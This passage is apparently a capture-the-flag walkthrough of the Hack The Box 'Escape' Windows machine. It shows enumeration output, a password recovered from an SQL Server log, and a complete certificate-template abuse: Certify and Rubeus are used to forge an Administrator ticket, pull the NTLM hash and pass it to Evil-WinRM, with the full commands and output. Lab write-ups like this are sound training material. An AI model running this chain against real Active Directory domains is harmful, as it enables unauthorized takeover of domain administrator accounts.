 [+] DPAPI MASTER KEYS                                                                                                                                                                                   
   [i] Use the Mimikatz 'dpapi::masterkey' module with appropriate arguments (/rpc) to decrypt                                                                                                           
   [?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#dpapi                                                                                                            
                                                                                                                                                                                                         
                                                                                                                                                                                                         
    Directory: C:\Users\sql_svc\AppData\Roaming\Microsoft\Protect                                                                                                                                        
                                                                                                                                                                                                         
                                                                                                                                                                                                         
Mode                LastWriteTime         Length Name                                                                                                                                                    
----                -------------         ------ ----                                                                                                                                                    
d---s-       11/19/2022   3:11 AM                S-1-5-21-4078382237-1492182817-2568127209-1106                                                                                                          
[...]
C:\Windows\Panther\setupinfo                                                                                                                                                                             
C:\Windows\System32\ntds.dit                                                                                                                                                                             
C:\Windows\System32\config\SAM                                                                                                                                                                           
C:\Windows\System32\config\SYSTEM                                                                                                                                                                        
C:\Windows\System32\config\RegBack\SAM                                                                                                                                                                   
C:\Windows\System32\config\RegBack\SYSTEM                                                                                                                                                                
[...]

Obviously, in addition to some interesting files, the possible privileges available to the user are highlighted (to verify actual vulnerabilities) and the WSUS windows update service (often used precisely for the elevation of privileges).
Let's try to understand if the WSUS is really vulnerable.

*Evil-WinRM* PS C:\Users\sql_svc> reg query HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate /v WUServer
reg.exe : ERROR: The system was unable to find the specified registry key or value.
    + CategoryInfo          : NotSpecified: (ERROR: The syst...y key or value.:String) [], RemoteException
    + FullyQualifiedErrorId : NativeCommandError
*Evil-WinRM* PS C:\Users\sql_svc> reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg.exe : ERROR: The system was unable to find the specified registry key or value.
    + CategoryInfo          : NotSpecified: (ERROR: The syst...y key or value.:String) [], RemoteException
    + FullyQualifiedErrorId : NativeCommandError
*Evil-WinRM* PS C:\Users\sql_svc> reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg.exe : ERROR: The system was unable to find the specified registry key or value.
    + CategoryInfo          : NotSpecified: (ERROR: The syst...y key or value.:String) [], RemoteException
    + FullyQualifiedErrorId : NativeCommandError

*Evil-WinRM* PS C:\Users\sql_svc\Documents> reg query HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate /v WUServer


reg.exe : ERROR: The system was unable to find the specified registry key or value.
    + CategoryInfo          : NotSpecified: (ERROR: The syst...y key or value.:String) [], RemoteException
    + FullyQualifiedErrorId : NativeCommandError
*Evil-WinRM* PS C:\Users\sql_svc\Documents> reg query HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate 

HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WindowsUpdate\AU
*Evil-WinRM* PS C:\Users\sql_svc\Documents> reg query HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate\AU

HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WindowsUpdate\AU
    AUOptions    REG_DWORD    0x3

HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WindowsUpdate\AU\NoAutoUpdate
*Evil-WinRM* PS C:\Users\sql_svc\Documents> 

Already from the windows registry keys, there doesn't seem to be any hope.
Even on the privileges front, nothing particularly attractive seems to be highlighted, the masterkey of the user Ryan would be needed, but at the moment it does not seem to be available.
Let's try some other tools, for example, PrivescCheck.

GitHub - itm4n/PrivescCheck: Privilege Escalation Enumeration Script for Windows
Privilege Escalation Enumeration Script for Windows - GitHub - itm4n/PrivescCheck: Privilege Escalation Enumeration Script for Windows

PrivescCheck output

Also in this case I report only the interesting and noteworthy things.

[...]
+------+------------------------------------------------+------+
| TEST | APPS > Non-default Apps                        | INFO |
+------+------------------------------------------------+------+
| DESC | Enumerate non-default and third-party applications by |
|      | parsing the registry.                                 |
+------+-------------------------------------------------------+
[*] Found 6 result(s).

Name                         FullName                                     
----                         --------                                     
Microsoft SQL Server         C:\Program Files (x86)\Microsoft SQL Server  
Microsoft                    C:\Program Files\Microsoft                   
Microsoft SQL Server         C:\Program Files\Microsoft SQL Server        
Microsoft Visual Studio 10.0 C:\Program Files\Microsoft Visual Studio 10.0
VMware                       C:\Program Files\VMware                      
VMware Tools                 C:\Program Files\VMware\VMware Tools         
[...]
+------+------------------------------------------------+------+
| TEST | UPDATES > System up to date? (info)            | INFO |
+------+------------------------------------------------+------+
| DESC | Enumerate the installed updates and hotfixes by       |
|      | parsing the registry. If this fails, the check will   |
|      | fall back to the built-in 'Get-HotFix' cmdlet.        |
+------+-------------------------------------------------------+
[*] Found 9 result(s).

HotFixID  Description     InstalledBy                                  InstalledOn          
--------  -----------     -----------                                  -----------          
KB5011551 Update          NT AUTHORITY\SYSTEM                          2023-02-02 - 13:18:08
KB5011574 Update          sequel\Administrator                         2023-02-02 - 12:07:20
KB4512578 Security Update sequel\Administrator                         2023-02-01 - 23:13:20
KB4589208 Update          NT AUTHORITY\SYSTEM                          2023-02-01 - 21:10:30
KB5012170 Security Update sequel\Administrator                         2023-02-01 - 21:00:27
KB5020374 Security Update NT AUTHORITY\SYSTEM                          2023-02-01 - 19:29:33
KB4512577 Security Update S-1-5-21-89493159-3068390195-4120627384-1047 2019-09-06 - 17:24:38
KB5020866 Update                                                       1600-12-31 - 16:00:00
KB4514366 Update                                                       1600-12-31 - 16:00:00
[...]
+------+------------------------------------------------+------+
| TEST | UPDATES > System up to date?                   | VULN |
+------+------------------------------------------------+------+
| DESC | Enumerate the installed updates and hotfixes and      |
|      | check whether a patch was applied in the last 31      |
|      | days.                                                 |

[*] Found 1 result(s).

HotFixID  Description InstalledBy         InstalledOn          
--------  ----------- -----------         -----------          
KB5011551 Update      NT AUTHORITY\SYSTEM 2023-02-02 - 13:18:08
[...]
+------+------------------------------------------------+------+
| TEST | MISC > OS Version                              | INFO |
+------+------------------------------------------------+------+
| DESC | Print the detailed version number of the Operating    |
|      | System. If we can't get the update history, this      |
|      | might be useful.                                      |
+------+-------------------------------------------------------+
[*] Found 1 result(s).

Name                         Version                             
----                         -------                             
Windows Server 2019 Standard 10.0.17763 Version 1809 (17763.2746)
[...]

We get to a point where the use of classic windows tools becomes essential, let's try bloodhound.

BloodHound/Collectors at master · BloodHoundAD/BloodHound
Six Degrees of Domain Admin. Contribute to BloodHoundAD/BloodHound development by creating an account on GitHub.

I collect the necessary information...

*Evil-WinRM* PS C:\Users\sql_svc> upload ./attack/upld/SharpHound.exe ../sh.exe
Info: Uploading ./attack/upld/SharpHound.exe to ../sh.exe

                                                             
Data: 1402196 bytes of 1402196 bytes copied

Info: Upload successful!

*Evil-WinRM* PS C:\Users\sql_svc> ./sh.exe -c All --zipfilename output.zip
2023-03-25T23:50:54.5149380-07:00|INFORMATION|This version of SharpHound is compatible with the 4.2 Release of BloodHound
2023-03-25T23:50:54.6555838-07:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2023-03-25T23:50:54.6868023-07:00|INFORMATION|Initializing SharpHound at 11:50 PM on 3/25/2023
2023-03-25T23:50:55.0305487-07:00|INFORMATION|Loaded cache with stats: 56 ID to type mappings.
 56 name to SID mappings.
 0 machine sid mappings.
 2 sid to domain mappings.
 0 global catalog mappings.
2023-03-25T23:50:55.0461913-07:00|INFORMATION|Flags: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2023-03-25T23:50:55.1868496-07:00|INFORMATION|Beginning LDAP search for sequel.htb
2023-03-25T23:50:55.2336792-07:00|INFORMATION|Producer has finished, closing LDAP channel
2023-03-25T23:50:55.2336792-07:00|INFORMATION|LDAP channel closed, waiting for consumers
2023-03-25T23:51:25.2383915-07:00|INFORMATION|Status: 0 objects finished (+0 0)/s -- Using 40 MB RAM
2023-03-25T23:51:39.5292927-07:00|INFORMATION|Consumers finished, closing output channel
Closing writers
2023-03-25T23:51:39.5605157-07:00|INFORMATION|Output channel closed, waiting for output task to complete
2023-03-25T23:51:39.6386454-07:00|INFORMATION|Status: 97 objects finished (+97 2.204545)/s -- Using 42 MB RAM
2023-03-25T23:51:39.6386454-07:00|INFORMATION|Enumeration finished in 00:00:44.4448376
2023-03-25T23:51:39.7011650-07:00|INFORMATION|Saving cache with stats: 56 ID to type mappings.
 56 name to SID mappings.
 0 machine sid mappings.
 2 sid to domain mappings.
 0 global catalog mappings.
2023-03-25T23:51:39.7167826-07:00|INFORMATION|SharpHound Enumeration Completed at 11:51 PM on 3/25/2023! Happy Graphing!

*Evil-WinRM* PS C:\Users\sql_svc> download ./20230325235139_output.zip ./attack/dwnl/20230325235139_output.zip
Info: Downloading ./20230325235139_output.zip to ./attack/dwnl/20230325235139_output.zip

                                                             
Info: Download successful!

*Evil-WinRM* PS C:\Users\sql_svc>

...and analyze the result.

┌──(in7rud3r㉿kali-muletto)-[~]
└─$ xhost +local:$(id -nu)
non-network local connections being added to access control list
                                                                                                                                                                                                         
┌──(in7rud3r㉿kali-muletto)-[~]
└─$ sudo docker run -it \ 
  -p 7474:7474 \
  -p 7687:7687 \
  -e DISPLAY=unix$DISPLAY \
  -v /tmp/.X11-unix:/tmp/.X11-unix \
  --device=/dev/dri:/dev/dri \
  -v ~/temp:/data \
  --network host \
  --name bloodhound belane/bloodhound
WARNING: Published ports are discarded when using host network mode
Selecting JVM - Version:11.0.16+8-post-Debian-1deb11u1, Name:OpenJDK 64-Bit Server VM, Vendor:Debian
Changed password for user 'neo4j'. IMPORTANT: this change will only take effect if performed before the database is started for the first time.
Directories in use:
home:         /var/lib/neo4j
config:       /etc/neo4j
logs:         /var/log/neo4j
plugins:      /var/lib/neo4j/plugins
import:       /var/lib/neo4j/import
data:         /var/lib/neo4j/data
certificates: /var/lib/neo4j/certificates
licenses:     /var/lib/neo4j/licenses
run:          /var/lib/neo4j/run
Starting Neo4j.
Started neo4j (pid:84). It is available at http://localhost:7474
There may be a short delay until the server is ready.
*** Log in with bolt://127.0.0.1:7687 (neo4j:blood) ***

I use the containerized version, so wait for the availability of the Neo4j.


When logged in, upload the collected data (directly zip file).
Now, on the search box, search for the user you pawn: sql_svc.
Select it and mark the user as owned.
Search for the Ryan user account and select it, right-click and chose "shortest path from owned to here"

Well, the path is long enough, but the tool crashes as soon as you try to investigate the third link. Nonetheless, the information from previous nodes highlights standard attacks that I've faced in the past. Let's try them quickly.

GitHub - S1ckB0y1337/Active-Directory-Exploitation-Cheat-Sheet: A cheat sheet that contains common enumeration and attack methods for Windows Active Directory.
A cheat sheet that contains common enumeration and attack methods for Windows Active Directory. - GitHub - S1ckB0y1337/Active-Directory-Exploitation-Cheat-Sheet: A cheat sheet that contains common…

Again, however, nothing seems to emerge. The commands you run seem to throw an error while generating the security object; another hole in the water.

I'm starting to feel this dead end approaching, but I still have some resources, let's try some exploits suggester for Windows.

GitHub - AonCyberLabs/Windows-Exploit-Suggester: This tool compares a targets patch levels against the Microsoft vulnerability database in order to detect potential missing patches on the target. It also notifies the user if there are public exploits and Metasploit modules available for the missing bulletins.
This tool compares a targets patch levels against the Microsoft vulnerability database in order to detect potential missing patches on the target. It also notifies the user if there are public expl…
*Evil-WinRM* PS C:\Users\sql_svc\Documents> systeminfo > systeminfo.txt
Program 'systeminfo.exe' failed to run: Access is deniedAt line:1 char:1
+ systeminfo > systeminfo.txt
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~.
At line:1 char:1
+ systeminfo > systeminfo.txt
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : ResourceUnavailable: (:) [], ApplicationFailedException
    + FullyQualifiedErrorId : NativeCommandFailed

Once again blocked even before starting. Next another.

GitHub - bitsadmin/wesng: Windows Exploit Suggester - Next Generation
Windows Exploit Suggester - Next Generation. Contribute to bitsadmin/wesng development by creating an account on GitHub.
*Evil-WinRM* PS C:\Users\sql_svc\Documents> cscript.exe missingkbs.vbs
Microsoft (R) Windows Script Host Version 5.812
Copyright (C) Microsoft Corporation. All rights reserved.

Windows Exploit Suggester: Missing KBs Identifier v1.0
https://github.com/bitsadmin/wesng/

cscript.exe : [-] This script needs to be executed as an elevated Administrator
    + CategoryInfo          : NotSpecified: ([-] This script...d Administrator:String) [], RemoteException
    + FullyQualifiedErrorId : NativeCommandError

Exhausted and out of ideas, I abandon my goal for a few days (needless to tell us, when you slam too much on the same apparently unsolvable problem, disconnect... let your mind refresh, empty and face the problem again).

As you can see, I was stubborn in the search for an advanced exploit and my belief that the resolution depended on it did not take my eyes off a dead end in which I was closed for several days. But sometimes simplicity and banality are the most improbable and unexpected ways.

So I go back to the machine after a few days and with the memories of all the attempts tried up to that moment, I go back to having a look at the resources available from the shell. I then find a folder on the root containing what appears to be the SQL Server installation package and a couple of other directories one of which contains a backup file.

*Evil-WinRM* PS C:\sqlserver> dir -force


    Directory: C:\sqlserver


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----         2/7/2023   8:06 AM                Logs
d-----       11/18/2022   1:37 PM                SQLEXPR_2019
-a----       11/18/2022   1:35 PM        6379936 sqlexpress.exe
-a----       11/18/2022   1:36 PM      268090448 SQLEXPR_x64_ENU.exe


*Evil-WinRM* PS C:\sqlserver> cd logs
*Evil-WinRM* PS C:\sqlserver\logs> dir -force


    Directory: C:\sqlserver\logs


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----         2/7/2023   8:06 AM          27608 ERRORLOG.BAK

I start sifting through the log file and find two consecutive failed accesses within a few.... hundredths of a second (it seems a bit exaggerated to me, but we'll stick to the clues).

*Evil-WinRM* PS C:\sqlserver\logs> type ERRORLOG.BAK
2022-11-18 13:43:05.96 Server      Microsoft SQL Server 2019 (RTM) - 15.0.2000.5 (X64)
        Sep 24 2019 13:48:23
        Copyright (C) 2019 Microsoft Corporation
        Express Edition (64-bit) on Windows Server 2019 Standard Evaluation 10.0 <X64> (Build 17763: ) (Hypervisor)
[...]
2022-11-18 13:43:07.44 spid51      Changed database context to 'master'.
2022-11-18 13:43:07.44 spid51      Changed language setting to us_english.
2022-11-18 13:43:07.44 Logon       Error: 18456, Severity: 14, State: 8.
2022-11-18 13:43:07.44 Logon       Logon failed for user 'sequel.htb\Ryan.Cooper'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
2022-11-18 13:43:07.48 Logon       Error: 18456, Severity: 14, State: 8.
2022-11-18 13:43:07.48 Logon       Logon failed for user 'NuclearMosquito3'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
2022-11-18 13:43:07.72 spid51      Attempting to load library 'xpstar.dll' into memory. This is an informational message only. No user action is required.
[...]

All we have to do is reconnect with Evil-WinRM using the new credentials.

┌──(in7rud3r㉿kali-muletto)-[~/…/_10.10.11.202 - Escape (win)/attack/upld/sggstr]
└─$ evil-winrm -i 10.10.11.202 -u Ryan.Cooper -p NuclearMosquito3 

Evil-WinRM shell v3.4

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Ryan.Cooper\Documents> cd ..\desktop
*Evil-WinRM* PS C:\Users\Ryan.Cooper\desktop> dir


    Directory: C:\Users\Ryan.Cooper\desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---         4/1/2023   4:23 PM             34 user.txt


*Evil-WinRM* PS C:\Users\Ryan.Cooper\desktop> type user.txt
f******************************5

And the first flag is captured. Ok, at this point the steps repeat as before. Unfortunately also in this case, nothing with winPEAS, nothing with BloodHound, nothing with PowerScript and Rubeus; another dead end.

As exhausted, I rely on the suggestions of the forum and thus discover a new (for me) interesting tool: "just download the Certify.exe".

GitHub - GhostPack/Certify: Active Directory certificate abuse.
Active Directory certificate abuse. Contribute to GhostPack/Certify development by creating an account on GitHub.

It looks really interesting, let's see what comes out.

*Evil-WinRM* PS C:\Users\Ryan.Cooper\downloads> ./Certify.exe find /vulnerable

   _____          _   _  __
  / ____|        | | (_)/ _|
 | |     ___ _ __| |_ _| |_ _   _
 | |    / _ \ '__| __| |  _| | | |
 | |___|  __/ |  | |_| | | | |_| |
  \_____\___|_|   \__|_|_|  \__, |
                             __/ |
                            |___./
  v1.1.0

[*] Action: Find certificate templates
[*] Using the search base 'CN=Configuration,DC=sequel,DC=htb'

[*] Listing info about the Enterprise CA 'sequel-DC-CA'

    Enterprise CA Name            : sequel-DC-CA
    DNS Hostname                  : dc.sequel.htb
    FullName                      : dc.sequel.htb\sequel-DC-CA
    Flags                         : SUPPORTS_NT_AUTHENTICATION, CA_SERVERTYPE_ADVANCED
    Cert SubjectName              : CN=sequel-DC-CA, DC=sequel, DC=htb
    Cert Thumbprint               : A263EA89CAFE503BB33513E359747FD262F91A56
    Cert Serial                   : 1EF2FA9A7E6EADAD4F5382F4CE283101
    Cert Start Date               : 11/18/2022 12:58:46 PM
    Cert End Date                 : 11/18/2121 1:08:46 PM
    Cert Chain                    : CN=sequel-DC-CA,DC=sequel,DC=htb
    UserSpecifiedSAN              : Disabled
    CA Permissions                :
      Owner: BUILTIN\Administrators        S-1-5-32-544

      Access Rights                                     Principal

      Allow  Enroll                                     NT AUTHORITY\Authenticated UsersS-1-5-11
      Allow  ManageCA, ManageCertificates               BUILTIN\Administrators        S-1-5-32-544
      Allow  ManageCA, ManageCertificates               sequel\Domain Admins          S-1-5-21-4078382237-1492182817-2568127209-512
      Allow  ManageCA, ManageCertificates               sequel\Enterprise Admins      S-1-5-21-4078382237-1492182817-2568127209-519
    Enrollment Agent Restrictions : None

[!] Vulnerable Certificates Templates :

    CA Name                               : dc.sequel.htb\sequel-DC-CA
    Template Name                         : UserAuthentication
    Schema Version                        : 2
    Validity Period                       : 10 years
    Renewal Period                        : 6 weeks
    msPKI-Certificate-Name-Flag          : ENROLLEE_SUPPLIES_SUBJECT
    mspki-enrollment-flag                 : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS
    Authorized Signatures Required        : 0
    pkiextendedkeyusage                   : Client Authentication, Encrypting File System, Secure Email
    mspki-certificate-application-policy  : Client Authentication, Encrypting File System, Secure Email
    Permissions
      Enrollment Permissions
        Enrollment Rights           : sequel\Domain Admins          S-1-5-21-4078382237-1492182817-2568127209-512
                                      sequel\Domain Users           S-1-5-21-4078382237-1492182817-2568127209-513
                                      sequel\Enterprise Admins      S-1-5-21-4078382237-1492182817-2568127209-519
      Object Control Permissions
        Owner                       : sequel\Administrator          S-1-5-21-4078382237-1492182817-2568127209-500
        WriteOwner Principals       : sequel\Administrator          S-1-5-21-4078382237-1492182817-2568127209-500
                                      sequel\Domain Admins          S-1-5-21-4078382237-1492182817-2568127209-512
                                      sequel\Enterprise Admins      S-1-5-21-4078382237-1492182817-2568127209-519
        WriteDacl Principals        : sequel\Administrator          S-1-5-21-4078382237-1492182817-2568127209-500
                                      sequel\Domain Admins          S-1-5-21-4078382237-1492182817-2568127209-512
                                      sequel\Enterprise Admins      S-1-5-21-4078382237-1492182817-2568127209-519
        WriteProperty Principals    : sequel\Administrator          S-1-5-21-4078382237-1492182817-2568127209-500
                                      sequel\Domain Admins          S-1-5-21-4078382237-1492182817-2568127209-512
                                      sequel\Enterprise Admins      S-1-5-21-4078382237-1492182817-2568127209-519



Certify completed in 00:00:10.2338568

As in the example given in the git repository documentation, our user also seems to be enabled for the ManageCA privilege (but what a coincidence). Go on.

*Evil-WinRM* PS C:\Users\Ryan.Cooper\downloads> ./Certify.exe request /ca:dc.sequel.htb\sequel-DC-CA /template:UserAuthentication /altname:Administrator

   _____          _   _  __
  / ____|        | | (_)/ _|
 | |     ___ _ __| |_ _| |_ _   _
 | |    / _ \ '__| __| |  _| | | |
 | |___|  __/ |  | |_| | | | |_| |
  \_____\___|_|   \__|_|_|  \__, |
                             __/ |
                            |___./
  v1.1.0

[*] Action: Request a Certificates

[*] Current user context    : sequel\Ryan.Cooper
[*] No subject name specified, using current context as subject.

[*] Template                : UserAuthentication
[*] Subject                 : CN=Ryan.Cooper, CN=Users, DC=sequel, DC=htb
[*] AltName                 : Administrator

[*] Certificate Authority   : dc.sequel.htb\sequel-DC-CA

[*] CA Response             : The certificate had been issued.
[*] Request ID              : 12

[*] cert.pem         :

-----BEGIN RSA PRIVATE KEY-----
MIIEogIBAAKCAQEAvG6vT+UG9HVxfQllC9sDCLkgIe2yUKOCnLEhaQXtDnjyqtik
k/afDQlLoFFzrtRSkkVEdad8FTv0Jp/k0jggUemH32mTkFncol1eMyFJC4HCHmGc
[...]
2fyAvkVl6e0kkDoE4XFqX4FnVTlnC6RlR9xzlaeJRkZEzCzhPqAI1tahkcV9JOU9
ZxtxrK8ZgGYY9lXCH2kXZ76NEAvnaY167v6EmNyKWo2Yh1X9V8A=
-----END RSA PRIVATE KEY-----
-----BEGIN CERTIFICATE-----
MIIGEjCCBPqgAwIBAgITHgAAAAxRrpFSnZZtuQAAAAAADDANBgkqhkiG9w0BAQsF
ADBEMRMwEQYKCZImiZPyLGQBGRYDaHRiMRYwFAYKCZImiZPyLGQBGRYGc2VxdWVs
[...]
it7yHBHqFb0JX/RS/++fW1VN+oI5ZX0juicCdqvON7i1s1kTth7dkfa7Ae3sm3SU
exO2srhH7p4l/Z6l8mwODDbCnantdw==
-----END CERTIFICATE-----


[*] Convert with: openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx



Certify completed in 00:00:13.3681079

Create the pfx key from the recovered certificate.

┌──(in7rud3r㉿kali-muletto)-[~/…/hackthebox/_10.10.11.202 - Escape (win)/attack/cert]
└─$ openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
Enter Export Password:
Verifying - Enter Export Password:
                                                                                                                                                                                                         
┌──(in7rud3r㉿kali-muletto)-[~/…/hackthebox/_10.10.11.202 - Escape (win)/attack/cert]
└─$ ls -la
total 16
drwxr-xr-x 2 in7rud3r in7rud3r 4096 Apr  5 17:48 .
drwxr-xr-x 6 in7rud3r in7rud3r 4096 Apr  5 17:46 ..
-rw-r--r-- 1 in7rud3r in7rud3r 3842 Apr  5 17:47 cert.pem
-rw------- 1 in7rud3r in7rud3r 3409 Apr  5 17:48 cert.pfx

And we ask for the resolution of the TGT key.

*Evil-WinRM* PS C:\Users\Ryan.Cooper\downloads> ./Rubeus.exe asktgt /user:Administrator /certificate:cert.pfx

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.2.2

[*] Action: Ask TGT

[*] Using PKINIT with etype rc4_hmac and subject: CN=Ryan.Cooper, CN=Users, DC=sequel, DC=htb
[*] Building AS-REQ (w/ PKINIT preauth) for: 'sequel.htb\Administrator'
[*] Using domain controller: fe80::a477:436e:5730:3595%4:88
[+] TGT request successful!
[*] base64(ticket.kirbi):

      doIGSDCCBkSgAwIBBaEDAgEWooIFXjCCBVphggVWMIIFUqADAgEFoQwbClNFUVVFTC5IVEKiHzAdoAMC
      AQKhFjAUGwZrcmJ0Z3QbCnNlcXVlbC5odGKjggUaMIIFFqADAgESoQMCAQKiggUIBIIFBEnvQzQSZedn
[...]
      BwMFAADhAAClERgPMjAyMzA0MDYwNTUxNDVaphEYDzIwMjMwNDA2MTU1MTQ1WqcRGA8yMDIzMDQxMzA1
      NTE0NVqoDBsKU0VRVUVMLkhUQqkfMB2gAwIBAqEWMBQbBmtyYnRndBsKc2VxdWVsLmh0Yg==

  ServiceName              :  krbtgt/sequel.htb
  ServiceRealm             :  SEQUEL.HTB
  UserName                 :  Administrator
  UserRealm                :  SEQUEL.HTB
  StartTime                :  4/5/2023 10:51:45 PM
  EndTime                  :  4/6/2023 8:51:45 AM
  RenewTill                :  4/12/2023 10:51:45 PM
  Flags                    :  name_canonicalize, pre_authent, initial, renewable
  KeyType                  :  rc4_hmac
  Base64(key)              :  xXtPDJD44N/LDDFDSZt7lQ==
  ASREP (key)              :  25425F5D4ED1042512BFC036C6A94862

There are two different ways to obtain the hash password (that I know), using ccache...

GitHub - Hackplayers/evil-winrm: The ultimate WinRM shell for hacking/pentesting
The ultimate WinRM shell for hacking/pentesting. Contribute to Hackplayers/evil-winrm development by creating an account on GitHub.

...or generating it from Rubeus itself; let me use the simplest method.

*Evil-WinRM* PS C:\Users\Ryan.Cooper\downloads> ./Rubeus.exe asktgt /user:Administrator /certificate:cert.pfx /getcredentials

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.2.2

[*] Action: Ask TGT

[*] Using PKINIT with etype rc4_hmac and subject: CN=Ryan.Cooper, CN=Users, DC=sequel, DC=htb
[*] Building AS-REQ (w/ PKINIT preauth) for: 'sequel.htb\Administrator'
[*] Using domain controller: fe80::a477:436e:5730:3595%4:88
[+] TGT request successful!
[*] base64(ticket.kirbi):

      doIGSDCCBkSgAwIBBaEDAgEWooIFXjCCBVphggVWMIIFUqADAgEFoQwbClNFUVVFTC5IVEKiHzAdoAMC
      AQKhFjAUGwZrcmJ0Z3QbCnNlcXVlbC5odGKjggUaMIIFFqADAgESoQMCAQKiggUIBIIFBBbDT2EbXfI1
[...]
      BwMFAADhAAClERgPMjAyMzA0MDYwNjE0MTNaphEYDzIwMjMwNDA2MTYxNDEzWqcRGA8yMDIzMDQxMzA2
      MTQxM1qoDBsKU0VRVUVMLkhUQqkfMB2gAwIBAqEWMBQbBmtyYnRndBsKc2VxdWVsLmh0Yg==

  ServiceName              :  krbtgt/sequel.htb
  ServiceRealm             :  SEQUEL.HTB
  UserName                 :  Administrator
  UserRealm                :  SEQUEL.HTB
  StartTime                :  4/5/2023 11:14:13 PM
  EndTime                  :  4/6/2023 9:14:13 AM
  RenewTill                :  4/12/2023 11:14:13 PM
  Flags                    :  name_canonicalize, pre_authent, initial, renewable
  KeyType                  :  rc4_hmac
  Base64(key)              :  xiXbj5e7f3J3Xv2+WDcN7A==
  ASREP (key)              :  C877552CA622B1DC65D65CC9007546E9

[*] Getting credentials using U2U

  CredentialInfo         :
    Version              : 0
    EncryptionType       : rc4_hmac
    CredentialData       :
      CredentialCount    : 1
       NTLM              : A52F78E4C751E5F5E17E1E9F3E58F4EE

And we run straight to the root flag without delay, once again exploiting the potential of Evil-WinRM.

┌──(in7rud3r㉿kali-muletto)-[~/Dropbox/hackthebox/--==## DONE ##==--]
└─$ evil-winrm -i 10.10.11.202 -u Administrator -H A52F78E4C751E5F5E17E1E9F3E58F4EE

Evil-WinRM shell v3.4

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
sequel\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents> type ../Desktop/root.txt
b4c008685abf917ffbf974fddb917a8a
*Evil-WinRM* PS C:\Users\Administrator\Documents> 

And once again... that's all folks, I sweated for a few days, but in the end, I managed to overcome every obstacle (even the most trivial ones, next time, look around before proceeding down the most impervious routes). For the moment, goodbye, but I'll wait for you at the next BOX, happy hacking everyone!